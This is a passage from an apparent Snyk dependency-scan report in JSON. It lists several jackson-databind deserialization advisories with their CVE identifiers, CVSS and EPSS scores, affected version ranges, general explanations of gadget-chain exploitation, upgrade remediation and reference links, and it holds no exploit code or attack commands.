The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + 
"assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + 
"cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
